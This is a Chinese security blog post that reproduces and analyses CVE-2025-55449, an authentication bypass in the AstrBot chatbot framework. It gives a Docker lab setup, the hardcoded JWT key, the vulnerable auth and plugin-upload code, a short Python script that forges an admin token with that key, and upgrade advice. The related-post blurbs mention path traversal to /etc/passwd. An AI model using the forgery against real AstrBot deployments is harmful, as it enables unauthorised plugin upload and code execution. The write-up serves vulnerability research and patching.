AstrBot 远程代码执行漏洞 | CVE-2025-55449 复现&研究

最新推荐文章于 2026-06-16 17:44:11 发布
原创 最新推荐文章于 2026-06-16 17:44:11 发布 · 1.5k 阅读 · 18 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#安全漏洞 #经验分享 #ai
Python3.8

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

0x0 背景介绍

AstrBotAstrBotDevs 开发的一款开源大型语言模型聊天机器人及开发框架,支持多平台部署和插件扩展。该项目基于Python开发,提供Web管理界面(dashboard),允许用户通过插件系统扩展功能,集成各类大语言模型 API,广泛应用于企业和个人构建自定义AI助手场景AstrBot 使用了固定的 JWT 签名密钥,攻击者可利用该密钥伪造任意有效的 JWT 认证令牌,完全绕过身份验证机制。成功绕过认证后,攻击者可访问插件管理接口,通过上传恶意的 Python 插件文件实现远程代码执行。

0x1 环境搭建

Ubuntu24+Docker搭建配置

#创建专属目录
mkdir astrbot-cve-jwt&cd astrbot-cve-jwt/

#拉取项目
wget https://github.com/AstrBotDevs/AstrBot/archive/refs/tags/v3.5.17.zip

#解压项目
unzip v3.5.17.zip


cd AstrBot-3.5.17/

#拉取docker
docker build -t astrbot-cve-2025-55449:3.5.17 .

#docker启动
docker run -d \
  --name astrbot-cve-2025-55449 \
  -p 6185:6185 \
  -v "$PWD/data:/app/data" \
  --restart unless-stopped \
  astrbot-cve-2025-55449:3.5.17


#或者参考官方文档部署,较为简单 [官方使用方式](https://docs.astrbot.app/deploy/astrbot/docker.html)

#检查是否启动成功
docker logs -f 76af634e14f2

项目启动成功

0x2 漏洞复现

Xray-xpoc检测

https://github.com/Kai-One001/cve-/blob/main/AstrBot-RCE-hard-coded-CVE-2025-55449.yml

复现截图

YML

复现流量特征 (PCAP)

1、公开密钥伪造的令牌进行安装

上传成功

2、后续明文命令执行

命令执行

0x3 漏洞原理分析

漏洞位置

漏洞位于 AstrBot-3.5.17/astrbot/core/__init__.py 文件:

# 初始化数据存储文件夹
os.makedirs(get_astrbot_data_path(), exist_ok=True)

WEBUI_SK = "Advanced_System_for_Text_Response_and_Bot_Operations_Tool"
DEMO_MODE = os.getenv("DEMO_MODE", False)

通过 IDE 搜索发现仅两处引用:
查询调用

1. JWT 密钥硬编码 + 身份伪造

Token 生成(auth.py)
def generate_jwt(self, username):
    payload = {
        "username": username,
        "exp": datetime.utcnow() + timedelta(days=7),
    }
    token = jwt.encode(payload, WEBUI_SK, algorithm="HS256")
    return token
  • 仅依赖 username 字段
  • 无用户存在性校验(任意用户名均可签发)
  • 无角色/权限信息绑定
Token 验证(server.py)
async def auth_middleware(self):
    try:
        payload = jwt.decode(token, WEBUI_SK, algorithms=["HS256"])
        g.username = payload["username"]  # ← 直接信任!
    except jwt.ExpiredSignatureError:
        return 401
    except jwt.InvalidTokenError:
        return 401
  • 仅验证签名有效性 + 过期时间
  • 不验证 username 是否真实存在于系统配置中
  • 无任何权限级别检查

1.1 接口利用

  • 文件位置:astrbot/dashboard/routes/plugin.py
async def install_plugin_upload(self):
    if DEMO_MODE: return error
    file = await request.files["file"]
    await file.save(...)
    plugin_info = await self.plugin_manager.install_plugin_from_file(file_path)
  • 工作流程:上传 ZIP → 自动解压 → 动态加载 Python 模块 → 任意代码执行
  • 严格说,这里应该控制谁可以使用接口,而不是没有验证 g.username 是否等于配置中的合法管理员用户名

2.尝试伪造

import jwt, datetime
key = "Advanced_System_for_Text_Response_and_Bot_Operations_Tool"
payload = {"username": "404LM", "exp": datetime.datetime.utcnow() + datetime.timedelta(days=7)}
forged = jwt.encode(payload, key, algorithm="HS256")
print(forged)
  • 使用该 Token 访问 /api/plugin/* 接口即可通过认证。
    伪造成功

3. JWT 结构解析

  • JWT 格式为:Header.Payload.Signature

  • 伪造的 Token 示例:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjQwNExNIiwiZXhwIjoxNzY0NTc1ODM0fQ.kdEj7q3sK4mFGZxStO7d-btECe2gJP_5GjENsVisXHM
第一部分:Header(头部)
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
解码为:
{
  "alg": "HS256",
  "typ": "JWT"
}
  • 得知系统使用的算法签名和令牌类型
第二部分:Payload(载荷)
eyJ1c2VybmFtZSI6IjQwNExNIiwiZXhwIjoxNzY0NTc1ODM0fQ
解码为:
{
  "username": "404LM",
  "exp": 1764575834  // 对应 2025-12-01 16:30:34 UTC
}
  • 得知,伪造的用户名和过期时间(时间戳)
第三部分:Signature(签名)
kdEj7q3sK4mFGZxStO7d-btECe2gJP_5GjENsVisXHM

这个是对前两部分(Header + Payload)使用 HMAC-SHA256 算法 + 密钥 计算出的签名
  • 密钥已知,签名可被任意伪造

0x4 修复建议

修复方案

  1. 升级到最新版本:升级到 v3.5.18 或更高版本。AstrBot

  2. 临时防护措施:限制 WebUI 访问或者反向代理增加额外验证

免责声明:本文仅用于安全研究目的,未经授权不得用于非法渗透测试活动。

您可能感兴趣的与本文相关的镜像

Python3.8

Python3.8

Conda
Python

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

AstrBot远程代码执行漏洞(CVE-2025-55449)安全风险通告
从零开始,掌握网络安全。提供全面的网络安全教程、攻防演练技巧和行业动态。
11-18 1148
摘要: AstrBot远程代码执行漏洞CVE-2025-55449)为高危漏洞(CVSS 9.8),通过硬编码JWT密钥绕过认证并上传恶意插件实现RCE,影响全球超1.9万个实例(中国占94%)。漏洞利用门槛低,POC已公开,可导致服务器完全失陷、数据泄露及横向渗透。修复需升级至≥3.5.18版本,临时措施包括网络隔离与禁用插件上传。长期建议强化密钥管理、插件沙箱隔离及WAF防护,尤其警惕公网暴露的科研及企业实例。该漏洞凸显LLM应用在认证与文件处理方面的安全缺陷,需纳入SDLC全过程防护。
智能AC管理系统HTTPD-AC 1.0服务存在未授权访问漏洞
nnn2188185的博客
09-19 470
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发智能AC管理系统HTTPD-AC 1.0服务。
AstrBot路径遍历漏洞导致敏感信息泄露(CVE-2025-48957)
m0_50125527的博客
06-04 637
AstrBot是一款智能自动化机器人助手,专注于提升工作效率和简化日常任务。它通过先进的AI技术实现自然语言交互,支持智能问答、任务管理、数据分析和自动化流程处理,适用于企业办公、客户服务、个人助理等场景。AstrBot具备多平台兼容性,可无缝集成到现有系统中,其学习优化能力还能根据用户习惯持续升级服务,帮助用户更高效地完成重复性工作,释放创造力。
CVE-2025-48957 | AstrBot get_file 文件读取漏洞研究
AKM4180的博客
07-25 982
AstrBot 3.4.4-3.5.12版本存在路径遍历漏洞(CVE-2025-48957),攻击者可通过未授权访问的/api/chat/get_file接口读取系统敏感文件。漏洞源于文件读取功能未对用户输入的filename参数进行路径规范化检查,导致可构造../../../../路径遍历读取服务器任意文件,包括API密钥、账户密码和数据库文件等。该漏洞已在3.5.13版本修复,用户可通过升级或禁用仪表盘功能临时缓解。
Goby 漏洞安全通告|AstrBot /api/plugin/install-upload 命令执行漏洞CVE-2025-55449
m0_46699477的博客
11-18 652
摘要:AstrBot(一款开源AI聊天机器人框架)存在高危身份验证绕过漏洞CVE-2025-55449),攻击者可利用固定JWT密钥伪造令牌,通过插件上传功能实现远程代码执行。影响版本为3.5.18之前,建议立即升级至3.5.18+版本。该漏洞POC已公开,可通过"仪表盘"等特征自查受影响系统。Goby等工具已支持漏洞检测。
CVE-2025-55449
weixin_43886198的博客
11-17 717
AstrBot<=3.5.17存在高危安全漏洞,其源代码中硬编码了JWT secret密钥,攻击者可利用该漏洞伪造JWT令牌任意上传恶意插件,最终实现远程代码执行(RCE)。漏洞影响版本为3.5.17及以下,已在GitHub公开POC验证程序。修复方案建议升级至最新版本或移除源码中的硬编码密钥。该漏洞编号为CVE-2025-55449,已收录至安全漏洞库。
CVE-2025-48957 AstrBot任意文件读取漏洞【WriteUp】
PHTR1的博客
02-09 575
AstrBot 3.4.4至3.5.12版本存在高危路径遍历漏洞CVE-2025-48957,CVSS 7.5),攻击者可通过构造恶意请求读取任意文件。漏洞位于/api/chat/get_file接口,由于未对filename参数进行安全校验,允许通过../../路径遍历访问系统敏感文件(如/etc/passwd)。POC和EXP已公开,建议立即升级修复。漏洞原理为直接拼接用户输入到文件路径,缺乏规范化检查,导致目录穿越攻击。
老胡的周刊(第179期)
howie6879's blog
03-02 1411
老胡的信息周刊[1],记录这周我看到的有价值的信息,主要针对计算机领域,内容主题极大程度被我个人喜好主导。这个项目核心目的在于记录让自己有印象的信息做一个留存以及共享。???? 项目simba[2]Simba的目标是简化知识管理,使开发者能够专注于构建核心人工智能功能,该系统具有现代化的用户界面和模块化架构,允许开发者轻松地插入不同的向量存储、嵌入模型、分块器和解析器:simbaAstrBot[3]A...
ubuntu下AstrBot +NapCat QQ机器人
uwvwko的博客
09-29 714
文档我是分开下的,直接一键下载docker拉不完全。
2025年7月28日当周关键漏洞汇总分析
分享技术点滴
10-04 790
跨站脚本(XSS)漏洞权限绕过问题信息泄露有限的代码执行能力。
第二届Solar杯应急响应挑战赛-WP(部分)
2301_81117728的博客
12-29 1194
实力有限,下面是名次。
面向 IM 平台的 Agentic AI 个人/群聊助手 | AstrBot
分享技术点滴
02-20 1199
🌟 感谢您使用 AstrBotAstrBot 是一款可接入多种 IM 平台的 Agentic AI 个人/群聊助手,内置多项强大功能,希望能为您带来高效、愉快的使用体验。❤️克隆仓库 安装核心后端 我们推荐使用 进行快速的 Python 依赖管理。 首次运行后,AstrBot 默认会在 启动一个 API 服务。启动管理面板 (WebUI) 为了方便管理,建议启动可视化仪表板。 管理面板默认运行在 。你可以在面板中完成后续的 LLM 提供商配置、插件管理等操作。启动 AstrBot 后,你可以向
云上搭建AstrBot(保姆级教程)
zysgns的博客
01-12 920
链接: https://pan.baidu.com/s/12XuKloSm98DUGGSwV7ZyMg?/platforms (初始账号密码都是astrbot)内网端口必须写6185,公网端口随便写一个可用的。3、 再python3虚拟环境下,安装uv。2、安装包解压后上传至/root目录下。4、编辑/root/.bashrc文件。(2)配置反向WS和Token。1、通过百度网盘下载安装包;3、接入deepseek。(1)配置机器人QQ号。5、通过UV安装依赖。1、安装NapCat。2、配置NapCat。
【春秋云境】CVE-2025-48957 AstrBot 版本号3.4.4至3.5.12存在路径遍历漏洞
HMX404的博客
02-26 501
AstrBot聊天机器人3.4.4-3.5.12版本存在路径遍历漏洞,攻击者可通过构造特殊请求访问系统敏感文件。POC演示了利用该漏洞读取/etc/passwd文件的过程。虽然目标文件不在根目录,但通过尝试不同路径最终成功获取系统信息。该漏洞可能导致服务器敏感数据泄露,建议用户及时升级修复。
面经经验分享|模拟面试的重要性前瞻
2501_94671711的博客
06-16 340
如果你已经准备好了去面试一家心仪公司,在面试之前,可以先进行一次模拟面试,这个环节是为了让你提前熟悉面试的流程和感觉。你可以请一位已经拿到 Offer 的小伙伴或者专业课程教师扮演面试官,然后根据目标公司的题库以及面试流程对你进行面试。如果你是线上面试,建议提前准备 2 个小时以上的空档时间和一个良好的网络环境,如果你是线下面试,则需要提前查询好公司方位以及相应的出行方式。是早已经拿到了暑期实习Offer ,还是被苦于找不到满意的实习Offer ,亦或者是正为了即将到来的秋招而如火如荼地准备着?
面经经验分享|熟练掌握面试考点
JunL0320的博客
06-16 444
不同的公司或部门,面试的流程和侧重点都有较大的差异。首先是会问简历上的实战项目,不过考虑到实习生没有工作经验,大部分项目都是课程设计或者跟着网课做的项目,所以这部分要求不是非常高,只要能说清楚自己做了什么,用了什么技术。其次是计算机的基础,比如:数据结构、操作系统、网络、编译等等,这里面最重要的就是数据结构与算法,一般稍微好点的公司都会在面试的时候加上一两道手写算法题。考虑到不同公司在面试中对技术考核占比的差异,建议候选人在面试前提前了解相应公司的面试流程,有针对性地去准备才能事半功倍。
面经经验分享|算法和数据结构考察
2501_94671711的博客
06-16 553
如大家所了解的,面试中考察的算法和数据结构。
专利流程岗上岸实录|奇智创达知识产权系统实操经验分享
JieDavid的博客
06-13 332
【专利流程工作数字化升级方案】从事3年专利流程工作的从业者分享数字化转型经验,通过奇智创达系统实现效率革命:1.官文处理从日均4小时人工操作升级为1分钟自动同步下载+智能邮件推送,彻底消除漏发风险;2.年费管理告别Excel台账模式,实现多级预警+一键缴费+自动留痕,杜绝逾期风险;3.XML转档突破官方插件限制,实现格式兼容+自动预检+直连递交,解决数据丢失痛点。系统将流程人员从高风险重复劳动中解放,转向高价值风控与客户服务,日均节省3-4小时,实现零差错运营。(149字)
内饰设计 DWG 图纸文字乱码怎么办?下载内饰字体方案.zip
06-19
彻底解决CAD图纸文字变问号、文字变乱码,以及其他所有字体缺失带来的烦恼
手动替换 CAD 字体后图纸依旧乱码怎么办?下载终极解决手册.rar
最新发布
06-19
解决CAD图纸文字变问号、文字变乱码,欢迎下载!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值